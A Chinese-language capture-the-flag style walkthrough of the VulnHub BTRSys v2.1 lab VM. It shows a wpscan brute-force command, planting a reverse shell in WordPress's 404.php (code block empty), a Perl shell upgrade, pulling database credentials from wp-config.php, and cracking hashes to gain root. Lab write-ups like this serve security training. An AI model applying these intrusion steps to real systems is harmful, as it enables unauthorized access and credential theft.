BTRSys: v2.1
项目地址:https://download.vulnhub.com/btrsys/BTRSys1.rar
是一个打包好的镜像文件
注意:导入 vmx 时一定要选择我已移动,否则没网
使用 Nmap 扫描出开放服务及操作系统版本

发现 /wordpress 目录,确认存在 WordPress 站点

弱口令
WordPress
使用 wpscan 检测 WordPress 版本和账号
1 | wpscan --url http://192.168.110.134/wordpress -U users.txt -P /usr/share/wordlists/rockyou.txt |
成功拿到账号密码
1 | admin:admin |

登录后台

RCE
WordPress
在后台可以编辑其 404.php 文件内容

修改为反弹 Shell
1 |
|
这里我是先访问的 Hello world! 默认页面
发现有参数 ?p=1,将去改为 666 触发 404 拿到 Shell


提权
使用 Perl 升级为交互式 Shell
Python 的不能用,换其他的试试
1 | perl -e 'exec "/bin/bash";' |
敏感信息泄露
翻找 WordPress 源码在 wp-config.php 中找到数据库账号密码

成功登录进数据库

翻找到账号密码

撞出哈希提权成功
